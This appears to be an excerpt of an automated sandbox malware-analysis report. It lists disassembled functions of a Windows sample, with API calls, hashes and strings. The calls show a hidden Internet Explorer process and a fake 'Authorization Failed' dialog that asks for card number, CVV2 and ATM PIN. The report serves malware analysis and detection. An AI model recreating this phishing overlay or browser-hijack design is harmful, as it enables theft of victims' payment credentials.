                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 89 4079e1-4079e3 82->89 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 90 4079b1 86->90 91 4079ab 86->91 87->80 88->82 92 4079ca-4079cd 88->92 90->82 91->86 92->82 93 4079c2 92->93 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
